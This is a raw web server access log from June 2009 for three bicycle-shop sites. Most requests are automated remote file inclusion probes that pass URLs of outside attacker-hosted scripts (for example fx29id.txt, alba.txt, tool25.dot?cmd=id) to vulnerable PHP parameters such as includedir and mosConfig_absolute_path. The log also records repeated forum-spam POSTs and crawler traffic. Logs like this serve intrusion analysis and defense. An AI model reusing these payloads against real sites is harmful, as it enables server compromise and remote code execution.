213.171.225.234 - - [12/Jun/2009:14:33:21 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.cybion.it/daimler/.../ida.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "houstonbikeshop.com"
213.171.225.234 - - [12/Jun/2009:14:34:45 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.cybion.it/daimler/.../ida.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "houstonbikeshop.com"
213.171.225.234 - - [12/Jun/2009:14:34:45 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.cybion.it/daimler/.../ida.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "houstonbikeshop.com"
65.55.107.181 - - [12/Jun/2009:14:36:33 -0700] "GET /logs/?N=D HTTP/1.1" 200 2368 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
213.171.225.234 - - [12/Jun/2009:14:38:26 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.cybion.it/daimler/.../ida.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.svbikes.com"
213.171.225.234 - - [12/Jun/2009:14:38:26 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.cybion.it/daimler/.../ida.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.svbikes.com"
209.25.133.199 - - [12/Jun/2009:14:40:09 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://colegiopenacorada.com/xoops_lib/modules/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "bicyclestoreshouston.com"
209.25.133.199 - - [12/Jun/2009:14:40:09 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://colegiopenacorada.com/xoops_lib/modules/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "bicyclestoreshouston.com"
209.25.133.199 - - [12/Jun/2009:14:40:09 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://colegiopenacorada.com/xoops_lib/modules/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "bicyclestoreshouston.com"
209.62.42.51 - - [12/Jun/2009:14:41:34 -0700] "GET /translations/Spanish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.nupecampus2.uneb.br/imagens/campus/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
209.62.42.51 - - [12/Jun/2009:14:41:34 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.nupecampus2.uneb.br/imagens/campus/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
209.25.133.199 - - [12/Jun/2009:14:41:34 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://colegiopenacorada.com/xoops_lib/modules/alba.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "bicyclestoreshouston.com"
209.25.133.199 - - [12/Jun/2009:14:41:34 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://colegiopenacorada.com/xoops_lib/modules/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "bicyclestoreshouston.com"
209.25.133.199 - - [12/Jun/2009:14:41:34 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://colegiopenacorada.com/xoops_lib/modules/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "bicyclestoreshouston.com"
209.62.42.51 - - [12/Jun/2009:14:41:34 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.nupecampus2.uneb.br/imagens/campus/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
209.25.133.199 - - [12/Jun/2009:14:41:37 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://colegiopenacorada.com/xoops_lib/modules/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "bicyclestoreshouston.com"
209.62.42.51 - - [12/Jun/2009:14:41:43 -0700] "GET /translations/Finnish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.nupecampus2.uneb.br/imagens/campus/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
209.62.42.51 - - [12/Jun/2009:14:42:50 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.nupecampus2.uneb.br/imagens/campus/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
209.62.42.51 - - [12/Jun/2009:14:42:50 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.nupecampus2.uneb.br/imagens/campus/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
209.62.42.51 - - [12/Jun/2009:14:42:51 -0700] "GET /translations/Hungarian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.nupecampus2.uneb.br/imagens/campus/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
209.62.42.51 - - [12/Jun/2009:14:42:51 -0700] "GET /translations/Italian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.nupecampus2.uneb.br/imagens/campus/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
209.25.133.199 - - [12/Jun/2009:14:43:14 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://colegiopenacorada.com/xoops_lib/modules/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "bicyclestoreshouston.com"
209.25.133.199 - - [12/Jun/2009:14:45:07 -0700] "GET /translations/Hungarian.txt//tools/send_reminders.php?noSet=0&includedir=http://colegiopenacorada.com/xoops_lib/modules/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "houstonbikeshop.com"
209.25.133.199 - - [12/Jun/2009:14:45:07 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://colegiopenacorada.com/xoops_lib/modules/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "houstonbikeshop.com"
209.25.133.199 - - [12/Jun/2009:14:45:08 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://colegiopenacorada.com/xoops_lib/modules/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "houstonbikeshop.com"
209.25.133.199 - - [12/Jun/2009:14:45:08 -0700] "GET /translations/Italian.txt//tools/send_reminders.php?noSet=0&includedir=http://colegiopenacorada.com/xoops_lib/modules/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "houstonbikeshop.com"
209.25.133.199 - - [12/Jun/2009:14:46:49 -0700] "GET /translations/Hungarian.txt//tools/send_reminders.php?noSet=0&includedir=http://colegiopenacorada.com/xoops_lib/modules/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "houstonbikeshop.com"
209.25.133.199 - - [12/Jun/2009:14:46:52 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://colegiopenacorada.com/xoops_lib/modules/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "houstonbikeshop.com"
209.25.133.199 - - [12/Jun/2009:14:46:52 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://colegiopenacorada.com/xoops_lib/modules/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "houstonbikeshop.com"
209.25.133.199 - - [12/Jun/2009:14:46:53 -0700] "GET /translations/Italian.txt//tools/send_reminders.php?noSet=0&includedir=http://colegiopenacorada.com/xoops_lib/modules/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "houstonbikeshop.com"
209.62.42.51 - - [12/Jun/2009:14:47:33 -0700] "GET /translations/German.txt//tools/send_reminders.php?noSet=0&includedir=http://www.nupecampus2.uneb.br/imagens/campus/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
65.55.106.230 - - [12/Jun/2009:14:49:53 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "bicyclestoreshouston.com"
222.122.160.145 - - [12/Jun/2009:14:50:21 -0700] "GET /logs//?mosConfig_absolute_path=http://www.aslcaserta2.it/img/rhs/list.txt?? HTTP/1.1" 200 2373 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "houstonbikeshop.com"
222.122.160.145 - - [12/Jun/2009:14:50:21 -0700] "GET /?mosConfig_absolute_path=http://www.aslcaserta2.it/img/rhs/list.txt?? HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "houstonbikeshop.com"
24.149.196.131 - - [12/Jun/2009:14:53:11 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10" "www.svbikes.com"
24.149.196.131 - - [12/Jun/2009:14:53:12 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10" "www.svbikes.com"
24.149.196.131 - - [12/Jun/2009:14:53:15 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10" "www.svbikes.com"
174.133.39.178 - - [12/Jun/2009:14:53:22 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)" "svbikes.com"
61.106.21.32 - - [12/Jun/2009:14:57:18 -0700] "GET /translations/Spanish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.atlaterapidernegi.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
91.121.150.170 - - [12/Jun/2009:14:59:03 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [12/Jun/2009:15:01:35 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
61.106.21.32 - - [12/Jun/2009:15:01:54 -0700] "GET /translations/Chinese-GB2312.txt//tools/send_reminders.php?noSet=0&includedir=http://www.atlaterapidernegi.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
61.106.21.32 - - [12/Jun/2009:15:01:54 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.atlaterapidernegi.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
61.106.21.32 - - [12/Jun/2009:15:01:54 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.atlaterapidernegi.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
61.106.21.32 - - [12/Jun/2009:15:03:19 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.atlaterapidernegi.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
61.106.21.32 - - [12/Jun/2009:15:03:20 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.atlaterapidernegi.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
72.30.79.51 - - [12/Jun/2009:15:05:43 -0700] "GET /bullitinboard/viewtopic.php?p=11362 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
69.162.126.138 - - [12/Jun/2009:15:07:36 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kmzrox.by.ru/tool25.dot?cmd=id? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "houstonbikeshop.com"
69.162.126.138 - - [12/Jun/2009:15:07:36 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kmzrox.by.ru/tool25.dot?cmd=id? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "houstonbikeshop.com"
209.25.133.199 - - [12/Jun/2009:15:08:39 -0700] "GET /translations/German.txt//tools/send_reminders.php?noSet=0&includedir=http://colegiopenacorada.com/xoops_lib/modules/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "houstonbikeshop.com"
91.121.150.170 - - [12/Jun/2009:15:09:29 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [12/Jun/2009:15:11:28 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
209.62.42.51 - - [12/Jun/2009:15:14:09 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.nupecampus2.uneb.br/imagens/campus/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [12/Jun/2009:15:15:32 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
209.62.42.51 - - [12/Jun/2009:15:16:12 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.nupecampus2.uneb.br/imagens/campus/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
209.62.42.51 - - [12/Jun/2009:15:16:12 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.nupecampus2.uneb.br/imagens/campus/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
209.62.42.51 - - [12/Jun/2009:15:16:12 -0700] "GET /translations/Chinese-GB2312.txt//tools/send_reminders.php?noSet=0&includedir=http://www.nupecampus2.uneb.br/imagens/campus/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
209.62.42.51 - - [12/Jun/2009:15:16:55 -0700] "GET /translations/English-US.txt//tools/send_reminders.php?noSet=0&includedir=http://www.nupecampus2.uneb.br/imagens/campus/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [12/Jun/2009:15:17:20 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
209.62.42.51 - - [12/Jun/2009:15:19:21 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.nupecampus2.uneb.br/imagens/campus/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
209.62.42.51 - - [12/Jun/2009:15:19:24 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.nupecampus2.uneb.br/imagens/campus/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
91.121.150.170 - - [12/Jun/2009:15:19:58 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
209.25.133.199 - - [12/Jun/2009:15:20:22 -0700] "GET /translations/Dutch.txt//tools/send_reminders.php?noSet=0&includedir=http://colegiopenacorada.com/xoops_lib/modules/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "houstonbikeshop.com"
119.63.194.59 - - [12/Jun/2009:15:22:01 -0700] "GET /bullitinboard/viewtopic.php?p=5049 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
81.19.66.38 - - [12/Jun/2009:15:23:16 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [12/Jun/2009:15:23:17 -0700] "GET /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
209.62.42.51 - - [12/Jun/2009:15:23:48 -0700] "GET /translations/Portuguese_BR.txt//tools/send_reminders.php?noSet=0&includedir=http://www.nupecampus2.uneb.br/imagens/campus/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
209.25.133.199 - - [12/Jun/2009:15:26:22 -0700] "GET /translations/French.txt//tools/send_reminders.php?noSet=0&includedir=http://colegiopenacorada.com/xoops_lib/modules/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "bicyclestoreshouston.com"
91.121.150.170 - - [12/Jun/2009:15:27:07 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
204.62.53.203 - - [12/Jun/2009:15:28:12 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
204.62.53.203 - - [12/Jun/2009:15:28:14 -0700] "GET /translations?N=D HTTP/1.1" 301 103 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
204.62.53.203 - - [12/Jun/2009:15:28:16 -0700] "GET /translations/?N=D HTTP/1.1" 200 3847 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
113.29.225.7 - - [12/Jun/2009:15:29:47 -0700] "GET /skin/zero_vote/error.php?dir=http://doverpark.org.sg/images/stories/food/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
113.29.225.7 - - [12/Jun/2009:15:29:47 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://doverpark.org.sg/images/stories/food/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
113.29.225.7 - - [12/Jun/2009:15:29:47 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://doverpark.org.sg/images/stories/food/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [12/Jun/2009:15:30:28 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [12/Jun/2009:15:36:16 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
113.29.225.7 - - [12/Jun/2009:15:36:25 -0700] "GET /skin/zero_vote/error.php?dir=http://doverpark.org.sg/images/stories/food/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
113.29.225.7 - - [12/Jun/2009:15:36:25 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://doverpark.org.sg/images/stories/food/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
113.29.225.7 - - [12/Jun/2009:15:36:25 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://doverpark.org.sg/images/stories/food/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
65.55.211.72 - - [12/Jun/2009:15:36:41 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
65.55.211.72 - - [12/Jun/2009:15:36:42 -0700] "GET /bullitinboard/ HTTP/1.1" 200 533 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
91.121.150.170 - - [12/Jun/2009:15:37:47 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [12/Jun/2009:15:44:05 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
213.171.225.234 - - [12/Jun/2009:15:45:21 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.cybion.it/daimler/.../ida.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.svbikes.com"
213.171.225.234 - - [12/Jun/2009:15:45:21 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.cybion.it/daimler/.../ida.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.svbikes.com"
193.47.80.45 - - [12/Jun/2009:15:48:35 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.svbikes.com"
193.47.80.45 - - [12/Jun/2009:15:48:35 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.svbikes.com"
113.29.225.7 - - [12/Jun/2009:15:50:49 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://doverpark.org.sg/images/stories/food/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
113.29.225.7 - - [12/Jun/2009:15:51:05 -0700] "GET /skin/zero_vote/error.php?dir=http://doverpark.org.sg/images/stories/food/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
113.29.225.7 - - [12/Jun/2009:15:51:05 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://doverpark.org.sg/images/stories/food/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
113.29.225.7 - - [12/Jun/2009:15:51:06 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://doverpark.org.sg/images/stories/food/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
71.167.13.182 - - [12/Jun/2009:16:05:37 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://bicyclestoreshouston.com/bullitinboard/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "bicyclestoreshouston.com"
71.167.13.182 - - [12/Jun/2009:16:05:37 -0700] "GET / HTTP/1.0" 200 1748 "http://bicyclestoreshouston.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "bicyclestoreshouston.com"
71.167.13.182 - - [12/Jun/2009:16:05:38 -0700] "GET /bullitinboard/ HTTP/1.0" 200 517 "http://bicyclestoreshouston.com/bullitinboard/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "bicyclestoreshouston.com"
222.122.160.145 - - [12/Jun/2009:16:11:09 -0700] "GET /index.php?page=http://www.aslcaserta2.it/img/rhs/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "houstonbikeshop.com"
222.122.160.145 - - [12/Jun/2009:16:11:09 -0700] "GET /logs/index.php?page=http://www.aslcaserta2.it/img/rhs/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "houstonbikeshop.com"
65.55.106.136 - - [12/Jun/2009:16:19:40 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
125.137.191.115 - - [12/Jun/2009:16:21:16 -0700] "GET //administrator/components/com_virtuemart/image_upload.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.137.191.115 - - [12/Jun/2009:16:21:16 -0700] "GET /logs///administrator/components/com_virtuemart/image_upload.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.137.191.115 - - [12/Jun/2009:16:21:16 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/image_upload.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.137.191.115 - - [12/Jun/2009:16:27:31 -0700] "GET //administrator/components/com_virtuemart/export_batch.inc.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.137.191.115 - - [12/Jun/2009:16:27:31 -0700] "GET /logs///administrator/components/com_virtuemart/export_batch.inc.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.137.191.115 - - [12/Jun/2009:16:27:31 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export_batch.inc.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
110.45.144.107 - - [12/Jun/2009:16:34:02 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.estojosfama.com.br/imagens/bann_representante.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
110.45.144.107 - - [12/Jun/2009:16:34:03 -0700] "GET /skin/zero_vote/error.php?dir=http://www.estojosfama.com.br/imagens/bann_representante.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
110.45.144.107 - - [12/Jun/2009:16:34:03 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.estojosfama.com.br/imagens/bann_representante.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
65.55.106.227 - - [12/Jun/2009:16:35:44 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "bicyclestoreshouston.com"
125.137.191.115 - - [12/Jun/2009:16:37:34 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/index2.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.137.191.115 - - [12/Jun/2009:16:37:34 -0700] "GET /logs///administrator/components/com_virtuemart/index2.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
125.137.191.115 - - [12/Jun/2009:16:37:35 -0700] "GET //administrator/